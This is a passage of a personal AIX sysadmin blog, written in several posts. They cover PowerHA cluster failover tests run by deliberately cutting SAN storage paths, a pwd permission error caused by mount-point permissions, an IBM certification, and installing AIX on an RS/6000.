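     * so the process no longer depends on paging anything in from disk */
    if (mlockall(MCL_CURRENT | MCL_FUTURE) != 0) {
        fprintf(stderr, "mlockall: %s\n", strerror(errno));
        return 1;
    }
    /* ... from here the hypothetical KILL_THE_NODE logic would run,
     * without ever touching the filesystem again ... */
    pause();    /* placeholder for the real handler loop */
    return 0;
}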

I hope that IBM fixes that. There is no APAR because I'm lazy... I don't even want to fight with the 1st line of support... BTW: I'm not the first one who noticed this problem; please see here for a blog post about the same issue from Ricardo Gameiro.

-Jakub.

PowerHA failure scenario when dealing with SAN-booted LPARs – part II

Monday, January 24th, 2011

OK, this is part II of the post "PowerHA failure scenario when dealing with SAN-booted LPARs – part I".

The first scenario we performed was to disable 100% of the MPIO storage paths to the active HACMP node by un-mapping the Virtual FibreChannel adapters (vadapters) on both VIOS protecting the active node (LPAR). On both VIOS we performed the following command:

$ vfcmap -vadapter vfchostXYZ -fcp

where vfchostXYZ was the server-side (or rather VIOS-side) vadapter handling FC I/O traffic for this LPAR. The result? The LPAR with the active HACMP/PowerHA Resource Groups on it (jkwha001d) after some time evicted itself from the HACMP cluster, and the old passive node jkwha002d became the active one (Oracle started there). The root cause as seen on the jkwha001d LPAR was the following:

root@jkwha001d : /home/root :# errpt
IDENTIFIER TIMESTAMP  T C RESOURCE_NAME  DESCRIPTION
AFA89905   0103071611 I O grpsvcs        Group Services daemon started
97419D60   0103071611 I O topsvcs        Topology Services daemon started
A6DF45AA   0103071111 I O RMCdaemon      The daemon is started.
67145A39   0103070911 U S SYSDUMP        SYSTEM DUMP
F48137AC   0103070911 U O minidump       COMPRESSED MINIMAL DUMP
DC73C03A   0103070911 T S fscsi0         SOFTWARE PROGRAM ERROR
9DBCFDEE   0103070911 T O errdemon       ERROR LOGGING TURNED ON
26623394   0103070511 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070511 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070511 T H fscsi1         COMMUNICATION PROTOCOL ERROR
(..)
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk4         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk8         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk6         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk3         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk2         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
DE3B8540   0103070411 P H hdisk0         PATH HAS FAILED
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DE3B8540   0103070411 P H hdisk5         PATH HAS FAILED
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
26623394   0103070411 T H fscsi1         COMMUNICATION PROTOCOL ERROR
DC73C03A   0103070411 T S fscsi1         SOFTWARE PROGRAM ERROR
(..)
A39F8A49   1210235210 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
D5676F6F   1210235210 T H fscsi1         ATTACHED SCSI TARGET DEVICE ERROR
DE3B8540   1210235210 P H hdisk6         PATH HAS FAILED
D5676F6F   1210235210 T H fscsi0         ATTACHED SCSI TARGET DEVICE ERROR
DE3B8540   1210235210 P H hdisk1         PATH HAS FAILED
D5676F6F   1210235210 T H fscsi1         ATTACHED SCSI TARGET DEVICE ERROR
(..)

As you can see, AIX 6.1 generated a "SYSTEM DUMP", which is actually a system panic indicator. Normally AIX saves the memory image of its kernel at runtime to the Logical Volumes configured with the "sysdump" type and then reboots. This allows investigating why the machine crashed, but here you won't see anything: you've lost FC storage connectivity (even rootvg), so it couldn't even save the dump. So where does this information come from? Probably the state of the LPAR crash is saved somewhere in the PowerVM firmware area. It's one of the RAS features in AIX/POWER. So far, so good: HACMP/PowerHA was able to recover the services...

OK, but we wanted to have real proof, so we performed a double check. We suspected that the VIOS might have some magic way to communicate with the LPAR. We wanted to exclude that factor, so we simulated disconnecting the FC at the storage level. The initial state was a stable HACMP cluster, with the RG active on jkwha002d (and jkwha001d being passive); all MPIO paths to the NetApp cluster (storage1, storage2) were reported as "Enabled" by "lspath". The igroup term in the NetApp world means "initiator group" and is responsible for things like LUN masking. If you remove access for some FC WWPNs on the LUN, it is going to end in a situation in which AIX has hdisks pointing to non-existing SCSI devices, and the AIX SCSI stack will get a lot of errors (FC is just a wrapper around SCSI).

On the 2nd storage controller (storage2) the igroup jkwha002d_boot was controlling access to the OS level LUNs (rootvg, etc):

storage2> lun show -g jkwha002d_boot
        /vol/jkwha002d_boot/boot/rootvg   40.0g (42953867264)   (r/w, online, mapped)
storage2>

Also on the 2nd storage controller there was an igroup responsible for the SAP and Oracle LUNs:

storage2> lun show -g jkwha002d_cluster
        /vol/sap_jw1_mirrlog/mirrlog/mirrlog01.lun      1g (1073741824)    (r/w, online, mapped)
        /vol/sap_jw1_oraarch/oraarch/oraarch01.lun     51g (54760833024)   (r/w, online, mapped)
        /vol/sap_jw1_sapdata/sapdata2/sapdata02.lun     15g (16106127360)   (r/w, online, mapped)
storage2>

The same igroup was present on the 1st storage system, controlling the remaining LUNs (yes, this is an active-active configuration, where reads/writes are managed by an AIX LVM VG consisting of LUNs from two controllers):

storage1> lun show -g jkwha002d_cluster
        /vol/clus_001d_002d_hb/hb/hbvg     20m (20971520)      (r/w, online, mapped)
        /vol/sap_jw1_origlog/origlog/origlog01.lun      1g (1073741824)    (r/w, online, mapped)
        /vol/sap_jw1_sapbin/sapbin/sapbin01.lun    100g (107374182400)  (r/w, online, mapped)
        /vol/sap_jw1_sapdata/sapdata1/sapdata01.lun     15g (16106127360)   (r/w, online, mapped)
storage1>

Let’s do it:

storage1> igroup remove
usage:
igroup remove [ -f ] <initiator_group> <node> ...
  - removes node(s) from an initiator group. The node may also
    specified as its alias. See "fcp wwpn-alias" for help with aliases
    By default, if lun maps exist for the initiator group, the node is
    not removed from the group. The -f option can be used to force the
    removal.
For more information, try 'man na_igroup'
storage1>
storage1> igroup remove -f jkwha002d_cluster c0:50:76:00:61:20:00:de
storage1> igroup remove -f jkwha002d_cluster c0:50:76:00:61:20:00:e0
storage2> igroup remove -f jkwha002d_cluster c0:50:76:00:61:20:00:de
storage2> igroup remove -f jkwha002d_cluster c0:50:76:00:61:20:00:e0
storage2> igroup remove -f jkwha002d_boot c0:50:76:00:61:20:00:de
storage2> igroup remove -f jkwha002d_boot c0:50:76:00:61:20:00:e0

... and HACMP failover won't work. The active LPAR node (jkwha002d) is going to end up in a zombie state. If you opened SSH sessions before, everything would indicate that it is working – ls on /etc and some command utilities too – but only because some things are cached in AIX's filesystem cache. Everything else is going to fail with I/O errors; lspath will cry too (it won't display all MPIO paths as failed, but that is a story for another post). Examples:

root@jkwha002d:# topas
bash: /usr/bin/topas: There is an input or output error.
root@jkwha002d:# nmon
bash: /usr/bin/nmon: There is an input or output error.
root@jkwha002d:# lspath
Failed  hdisk0 fscsi1
Failed  hdisk1 fscsi1
Enabled hdisk0 fscsi1
Failed  hdisk1 fscsi1
Failed  hdisk0 fscsi0
Failed  hdisk1 fscsi0
Failed  hdisk0 fscsi0
Enabled hdisk1 fscsi0
Failed  hdisk2 fscsi0
Failed  hdisk2 fscsi0
Failed  hdisk2 fscsi0
Failed  hdisk2 fscsi0
Enabled hdisk2 fscsi1
Failed  hdisk2 fscsi1
Failed  hdisk2 fscsi1
Failed  hdisk2 fscsi1
Failed  hdisk3 fscsi0
Failed  hdisk4 fscsi0
Failed  hdisk5 fscsi0
Failed  hdisk6 fscsi0
Failed  hdisk7 fscsi0
Failed  hdisk8 fscsi0
Failed  hdisk3 fscsi0
Failed  hdisk4 fscsi0
Failed  hdisk5 fscsi0
Failed  hdisk6 fscsi0
Failed  hdisk7 fscsi0
Failed  hdisk8 fscsi0
Failed  hdisk3 fscsi0
Failed  hdisk4 fscsi0
Failed  hdisk5 fscsi0
Failed  hdisk6 fscsi0
Failed  hdisk7 fscsi0
Failed  hdisk8 fscsi0
Failed  hdisk3 fscsi0
Failed  hdisk4 fscsi0
Failed  hdisk5 fscsi0
Failed  hdisk6 fscsi0
Failed  hdisk7 fscsi0
Failed  hdisk8 fscsi0
Failed  hdisk3 fscsi1
Failed  hdisk4 fscsi1
Enabled hdisk5 fscsi1
Enabled hdisk6 fscsi1
Failed  hdisk7 fscsi1
Failed  hdisk8 fscsi1
Enabled hdisk3 fscsi1
Enabled hdisk4 fscsi1
Failed  hdisk5 fscsi1
Failed  hdisk6 fscsi1
Failed  hdisk7 fscsi1
Failed  hdisk8 fscsi1
Failed  hdisk3 fscsi1
Failed  hdisk4 fscsi1
Failed  hdisk5 fscsi1
Failed  hdisk6 fscsi1
Enabled hdisk7 fscsi1
Failed  hdisk8 fscsi1
Failed  hdisk3 fscsi1
Failed  hdisk4 fscsi1
Failed  hdisk5 fscsi1
Failed  hdisk6 fscsi1
Failed  hdisk7 fscsi1
Enabled hdisk8 fscsi1
Missing hdisk9 fscsi0
Missing hdisk9 fscsi0
Missing hdisk9 fscsi1
Missing hdisk9 fscsi1
root@jkwha002d:# errpt | more
IDENTIFIER TIMESTAMP  T C RESOURCE_NAME  DESCRIPTION
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
B6267342   0103074511 P H hdisk0         DISK OPERATION ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
B6267342   0103074511 P H hdisk0         DISK OPERATION ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
EA88F829   0103074511 I O SYSJ2          USER DATA I/O ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
00B984B3   0103074511 U H hdisk0         UNDETERMINED ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
B6267342   0103074511 P H hdisk0         DISK OPERATION ERROR
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW
E86653C3   0103074511 P H LVDD           I/O ERROR DETECTED BY LVM
A39F8A49   0103074511 T S syserrlg       ERROR LOGGING BUFFER OVERFLOW

Oracle is going to panic (which is good behaviour in my opinion):

root@jkwha002d:# tail alert_JW1.log
Mon Jan  3 07:39:21 2011
Errors in file /oracle/JW1/saptrace/background/jw1_lgwr_831500.trc:
ORA-00345: redo log write error block 7 count 1
ORA-00312: online log 13 thread 1: '/oracle/JW1/origlogA/log_g13m1.dbf'
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: -1
Additional information: 512
Mon Jan  3 07:39:23 2011
Errors in file /oracle/JW1/saptrace/background/jw1_ckpt_368764.trc:
ORA-00206: error in writing (block 3, # blocks 1) of control file
ORA-00202: control file: '/oracle/JW1/origlogA/cntrl/cntrlJW1.dbf'
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: 10
Additional information: 3
ORA-00206: error in writing (block 3, # blocks 1) of control file
ORA-00202: control file: '/oracle/JW1/origlogB/cntrl/cntrlJW1.dbf'
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: 10
Additional information: 3
Mon Jan  3 07:39:23 2011
Errors in file /oracle/JW1/saptrace/background/jw1_ckpt_368764.trc:
ORA-00221: error on write to control file
ORA-00206: error in writing (block 3, # blocks 1) of control file
ORA-00202: control file: '/oracle/JW1/origlogA/cntrl/cntrlJW1.dbf'
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: 10
Additional information: 3
ORA-00206: error in writing (block 3, # blocks 1) of control file
ORA-00202: control file: '/oracle/JW1/origlogB/cntrl/cntrlJW1.dbf'
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: 10
Additional information: 3
Mon Jan  3 07:39:23 2011
CKPT: terminating instance due to error 221
Instance terminated by CKPT, pid = 368764
root@jkwha002d:#

But what's most interesting is that Oracle will ask AIX to write this to the alert log file – and it will be available to read with commands like "tail", while the "cat" command won't work (you won't be able to read the whole alert log file because you don't have I/O!). What's even more interesting is that you won't see those messages after rebooting (once the kernel memory is gone!). If you don't have I/O, how are you going to write/fsync this file???

Another thing is that the active HACMP node will still be active; it will keep handling Resource Groups, etc. Failover won't happen. A possible solution to this problem would be a kernel-based check that verifies that at least /etc is accessible. Why kernel-based? Because you have to have some form of heartbeat in memory (like an AIX kernel module, or an uncacheable binary always present in RAM, running at a real-time scheduling priority) that would continuously perform that check. If it failed several times in a row, it should reboot the node (which would trigger a Resource Group failover to the 2nd node in the cluster).

Note: typical HACMP scripting – at least in theory – is not enough; even if it forced running /sbin/halt, how can you be sure that /sbin/halt and all the required libc contents are in memory??
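A minimal userland sketch of the idea described above (my own assumption of how it could look, not an existing PowerHA feature): a small memory-pinned process keeps checking whether /etc is still readable and, after a few consecutive failures, forces the node down so that the Resource Group can move. The actual "kill the node" step is left as a placeholder, because exec'ing /sbin/halt is exactly what may no longer be possible; the probe file (/etc/hosts here) and the thresholds are arbitrary choices for illustration:

/* Sketch of a storage-loss watchdog (illustration, not a PowerHA component). */
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

#define MAX_FAILURES 3

/* Placeholder: must not depend on reading anything from disk.
 * On a real system this would be a kernel-assisted "halt/panic now" primitive. */
static void kill_the_node(void)
{
}

int main(void)
{
    int failures = 0;

    /* stay resident in RAM, so the check itself keeps working after storage is gone */
    (void) mlockall(MCL_CURRENT | MCL_FUTURE);

    for (;;) {
        char buf[64];
        int fd = open("/etc/hosts", O_RDONLY);   /* arbitrary probe file under /etc */

        /* note: a read may still be served from the filesystem cache for a while
         * (as shown above), so a real probe would have to bypass or defeat caching */
        if (fd >= 0 && read(fd, buf, sizeof(buf)) > 0)
            failures = 0;
        else
            failures++;

        if (fd >= 0)
            close(fd);

        if (failures >= MAX_FAILURES)
            kill_the_node();    /* storage is gone: take the node down, let the RG move */

        sleep(5);
    }
}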

Perhaps I'll write a part III of this article :)

-Jakub.

AIX, user gets “pwd: The file access permissions do not allow the specified action.”

Wednesday, January 12th, 2011

Just a short demonstration that file permissions matter on directories used as mount points under AIX 6.1. Let's say we have a properly running system; the Oracle software owner user "orand3" can access everything (pwd and ls commands):

root@kopsxsap003d:# mount | grep 102_64
         /dev/nd3orabin   /oracle/ND3/102_64 jfs2   Dec 03 12:00 rw,log=/dev/loglv00
root@kopsxsap003d:# oslevel
6.1.0.0
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64
root@kopsxsap003d:# su - orand3
kopsxsap003d:orand3 1> cd /oracle/ND3/102_64
kopsxsap003d:orand3 2> pwd
/oracle/ND3/102_64
kopsxsap003d:orand3 3> ls | head
MOPatch
OPatch
OPatch_old
admin
assistants
bali
bin
ccr
ccr_stage
cdata
kopsxsap003d:orand3 4> logout
root@kopsxsap003d:#

Now let's see how the permissions of the underlying mount point directory affect users after mounting:

root@kopsxsap003d:# umount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x    2 root     system          256 Aug 23 11:16 /oracle/ND3/102_64
root@kopsxsap003d:#

As you can see, the ownership changed from orand3:dba to root:system after unmounting (because in reality, after unmounting, /oracle/ND3/102_64 is just a directory on the higher-level filesystem, like /oracle or /oracle/ND3):

root@kopsxsap003d:# mount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64
root@kopsxsap003d:# umount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x    2 root     system          256 Aug 23 11:16 /oracle/ND3/102_64

OK, now we want to show how normal (i.e. non-root) users react to a mount point directory that does not allow them access:

root@kopsxsap003d:# chmod 700 /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwx------    2 root     system          256 Aug 23 11:16 /oracle/ND3/102_64
root@kopsxsap003d:# mount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64

See? After mounting, it changed to 755 orand3:dba, but underneath it is still root:system with 700. So what should the AIX kernel do? Let's see...

root@kopsxsap003d:# su - orand3
kopsxsap003d:orand3 1> cd /oracle/ND3/102_64
kopsxsap003d:orand3 2> pwd
pwd: The file access permissions do not allow the specified action.
kopsxsap003d:orand3 3> ls | head
MOPatch
OPatch
OPatch_old
admin
assistants
bali
bin
ccr
ccr_stage
cdata
kopsxsap003d:orand3 4> logout
root@kopsxsap003d:# umount /oracle/ND3/102_64
root@kopsxsap003d:# ls -ald /oracle/ND3/102_64
drwx------    2 root     system          256 Aug 23 11:16 /oracle/ND3/102_64
root@kopsxsap003d:#

As was demonstrated, the underlying mount point permissions DO HAVE an effect on non-root users for the pwd command if the underlying directory is not searchable for them. What's even more interesting is that the typical libc routines for opening and reading the directory work just fine; it is just a matter of the pwd command.

Ok – let’s fix it…

root@kopsxsap003d:# chmod 755 /oracle/ND3/102_64
root@kopsxsap003d:# mount /oracle/ND3/102_64
root@kopsxsap003d:# su - orand3
kopsxsap003d:orand3 1> cd /oracle/ND3/102_64
kopsxsap003d:orand3 2> pwd
/oracle/ND3/102_64
kopsxsap003d:orand3 3>

So what is the pwd command really doing?

kopsxsap003d:orand3 1> type pwd
pwd is a shell builtin.
kopsxsap003d:orand3 2> echo $SHELL
/usr/bin/csh
kopsxsap003d:orand3 3> /usr/bin/pwd
/oracle/ND3
kopsxsap003d:orand3 4>

So you have an internal pwd command (a shell builtin) but also a real command in /usr/bin. Let's see what's happening there:

root@kopsxsap003d:# umount /oracle/ND3/102_64
root@kopsxsap003d:# chmod 700 /oracle/ND3/102_64
root@kopsxsap003d:# mount /oracle/ND3/102_64
root@kopsxsap003d:# su - orand3
kopsxsap003d:orand3 1> cd /oracle/ND3/102_64
kopsxsap003d:orand3 2> pwd
pwd: The file access permissions do not allow the specified action.
kopsxsap003d:orand3 3> /usr/bin/pwd
pwd: The file access permissions do not allow the specified action.
kopsxsap003d:orand3 4> truss /usr/bin/pwd
execve("/usr/bin/pwd", 0x2FF22984, 0x20012ED8)   argc: 1
sbrk(0x00000000)                                = 0x2000104C
vmgetinfo(0x2FF21370, 7, 16)                    = 0
sbrk(0x00000000)                                = 0x2000104C
sbrk(0x00000004)                                = 0x2000104C
(..)
statx("/", 0x2FF21178, 176, 020)                = 0
statx("./", 0x2FF21178, 176, 020)               = 0
statx("./../", 0x2FF21010, 128, 010)            Err#13 EACCES
access("/usr/lib/nls/msg/en_US/libc.cat", 0)    = 0
_getpid()                                       = 8847484
kopen("/usr/lib/nls/msg/en_US/libc.cat", O_RDONLY) = 3
(..)
pwdkwrite(2, " p w d", 3)                               = 3
: kwrite(2, " :  ", 2)                          = 2
The file access permissions do not allow the specified action.kwrite(2, " T h e   f i l e   a c c".., 62)       = 62

(..)
_exit(1)
kopsxsap003d:orand3 5>

So the truth is hidden in the EACCES return code from the statx() syscall.

kopsxsap003d:orand3 11> cd /oracle/ND3/102_64
kopsxsap003d:orand3 12> ls | head
MOPatch
OPatch
OPatch_old
admin
assistants
bali
bin
ccr
ccr_stage
cdata
kopsxsap003d:orand3 13> ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64
kopsxsap003d:orand3 14> ls -al /oracle/ND3/102_64/|head
ls: 0653-345 /oracle/ND3/102_64/..: Permission denied.
total 280
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 .
drwxr-x---   35 orand3   dba            4096 Aug 23 12:45 .patch_storage
drwxr-xr-x    2 orand3   dba             256 May 10 2010  MOPatch
drwxr-xr-x    7 orand3   dba            4096 Nov 16 2009  OPatch
drwxr-x---    5 orand3   dba             256 Aug 23 12:27 OPatch_old
drwxr-xr-x    3 orand3   dba             256 Aug 23 13:36 admin
drwxr-x---    7 orand3   dba             256 Aug 23 12:18 assistants
drwxr-x---    3 orand3   dba             256 Aug 23 12:18 bali
drwxr-xr-x    2 orand3   dba           16384 Aug 23 12:45 bin
kopsxsap003d:orand3 15> ls -al .
ls: 0653-341 The fil does not exist.
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 .
kopsxsap003d:orand3 16> ls -al .
ls: 0653-345 ./..: Permission denied.
total 280
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 .
drwxr-x---   35 orand3   dba            4096 Aug 23 12:45 .patch_storage
drwxr-xr-x    2 orand3   dba             256 May 10 2010  MOPatch
drwxr-xr-x    7 orand3   dba            4096 Nov 16 2009  OPatch
drwxr-x---    5 orand3   dba             256 Aug 23 12:27 OPatch_old
drwxr-xr-x    3 orand3   dba             256 Aug 23 13:36 admin
drwxr-x---    7 orand3   dba             256 Aug 23 12:18 assistants
drwxr-x---    3 orand3   dba             256 Aug 23 12:18 bali
[..]
kopsxsap003d:orand3 19> ls -ald .
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 .
kopsxsap003d:orand3 20> ls -ald ./..
ls: 0653-345 ./..: Permission denied.
kopsxsap003d:orand3 21> ls -ald ./../..
ls: 0653-345 ./../..: Permission denied.
kopsxsap003d:orand3 22> ls -ald /oracle/ND3/102_64
drwxr-xr-x   74 orand3   dba            4096 Sep 28 06:44 /oracle/ND3/102_64
kopsxsap003d:orand3 23>

As you saw, if you are planning for some non-root users (e.g. Oracle in this case) to work properly on mounted filesystems under AIX, you need to have proper permissions on the mount point directory before mounting. There is no escape from this. It all comes down to the definition of the stat() family of system calls:

Description

       The stat subroutine obtains information about the file named by the Path parameter. Read, write, or execute
       permission for the named file is not required, but all directories listed in the path leading to the file must be
       searchable. The file information, which is a subset of the stat structure, is written to the area specified by the
       Buffer parameter.

"Searchable" for a directory in UNIX means "+x", so one has to have the execute bit set (+x) on the directory in order for it to be searchable for system calls.
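You can reproduce the pwd behaviour with a few lines of C: getcwd() (like the "/usr/bin/pwd" walk over ".." with statx()) has to be able to search every directory on the way up to "/", so on this AIX setup it fails with EACCES as soon as one of them – here the underlying mount point directory – is not searchable for the calling user. A quick illustration:

/* Quick demo: getcwd() fails with EACCES when a directory on the way
 * up to "/" is not searchable (+x) for the caller. */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <limits.h>

int main(void)
{
    char buf[PATH_MAX];

    if (getcwd(buf, sizeof(buf)) != NULL) {
        printf("cwd: %s\n", buf);
    } else {
        /* with the 700 root:system mount point underneath, this prints
         * something like: getcwd: Permission denied */
        fprintf(stderr, "getcwd: %s\n", strerror(errno));
    }
    return 0;
}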

-J.

PowerHA failure scenario when dealing with SAN-booted LPARs – part I

Sunday, January 9th, 2011

Together with Jedrzej we've exposed a rather interesting weakness in the IBM PowerHA 5.5 solution (in the old days it was called HACMP). Normally you would assume that in the case of a major cataclysm, such as *complete* storage disappearance on the active node, PowerHA or AIX has an internal mechanism to prevent downtime by switching the services to the next active node (as defined in the PowerHA policies/configuration). This starts to be really interesting when we are talking about SAN-booted AIX LPARs. As everybody knows, any form of assumption is bad (this is starting to be my mantra), and as we show here, avoiding this pitfall requires SOME PLANNING AND CONFIGURATION if you don't want to end up in a long downtime...

The environment consisted of:

  • Two LPARs (jkwha001d = active; jkwha002d = passive) running on separate Power frames.
  • Each LPAR on each frame was protected by a separate pair of VIOS (to provide redundancy for the NPIV-enabled FC fabrics and to enable Shared Ethernet Failover).
  • AIX 6.1 TL3
  • Oracle 10gR2
  • PowerHA 5.5SP2
  • NetApp Data ONTAP 7.3 storage (NetApp cluster, 2 controllers) – yes, the AIX LPARs are also SAN-booted from this storage
  • 1 network-based (IPv4) heartbeat
  • 1 disk-based (on FC LUN) heartbeat
  • Properly configured & running scripts for starting and stopping Oracle
  • No application monitors configured

We’ve performed two experiments:

  1. Simulating total storage loss only on jkwha001d (the active one, hosting Oracle) by unmapping the Virtual Fibre Channel (NPIV) host adapters (vadapters) on both VIOS protecting jkwha001d.
  2. Simulating total storage loss only on jkwha002d (the active one, hosting Oracle – after failover) by forcing disconnection of the jkwha002d Fibre Channel initiators (WWNs) on the NetApp cluster.

Both of these simulated the same thing... a virtual LPAR running without any storage at all. More on the results in the next post...

-Jakub.

I’m IBM Certified Advanced Technical Expert now…

Sunday, January 9th, 2011

This is going to be a rather short blog post. On the 17th of December last year (2010) I passed all of the prerequisites (5 other IBM certificates) for becoming an "IBM Certified Advanced Technical Expert – Power Systems with AIX" (the highest [master-level] credential for people working with and designing solutions with AIX, VIOS, PowerHA/HACMP, PowerVM, (D)LPARs, Linux on Power, etc.).


The story is rather boring and there are only two lessons:
1) you won't pass the required tests/certifications if you don't know this stuff deeply (each technology, like PowerVM or PowerHA, at the expert level – doh! you want to be an 'Advanced Technical Expert'!).
2) deep AIX knowledge alone is not enough. You need to get the big picture and be interested in the integration of everything that plays with AIX, so this includes applications, storage, high availability, disaster recovery, business requirements, a lot of experience of how everything interacts, etc. You need a lot of experience (years of it).

After my whole journey I can say that AIX and its surrounding ecosystem on Power is the most rock-solid and mature IT solution that I've ever worked with. There is not a lot on the market that can be compared to it, and this is the main reason why I decided to take this route. Now I'll try to blog in the future (if time permits) about several interesting cases involving Power Systems and AIX...

-Jakub.

AIX – first battle

Tuesday, June 19th, 2007

At the UnixDays conference I talked with many people, and they fascinated me with AIX – so I've bought one RS/6000 machine ;) But as everyone knows – a single system is boring. Maybe next year I'll build a home HACMP laboratory... :]

Yesterday my first RS/6000 server (7046-B50, CHRP, PPC 375, 1MB L2 cache, rack-mount) appeared in my house. Then it started (keep in mind that this was my first look at this OS):

0) It seems that the right serial port parameters are 9600 8N1 for SMS

1) AIX was not installed and the firmware was outdated; changing the default boot order in SMS

2) trying to install AIX 5.3 (with the outdated firmware) – yeah, I knew that this wouldn't work, but I wanted to check what happens ;)

3) step "2" failed ;)

4) updating the firmware to the latest one, resetting SMS to defaults, having lots of fun with Open Firmware (getting familiar with this damn PCI logical tree) – and finally I learned that a space makes a big difference for OF, e.g.

0> " scsi" select-dev ok

1> show-children ok

5) installing AIX again

6) ouch, some packages are missing on the CD; Google says that this is normal behaviour... hm (strictly speaking, the missing "devices.pci.ethernet" gives me a bad feeling...)

7) the install halted after displaying the missing packages stage? power off, power on, back to step 5

8) left the install running at the "missing packages" stage

9) finally AIX boots from the SCSI drive! yeah! but why the heck is install_assistant not running? why can't I log in via the console login?

10) ... time passes ... while having fun with rescue mode from the CD and rootvg imported from the internal SCSI id=2 drive ;) I love reading man pages... especially without less(1).

11) Google says that I should be using a real null-modem cable for serial login (full DTR, DSR & CD swapped). Hm, a Cisco null-modem cable doesn't work either. Damn, damn IBM!

12) back to 10

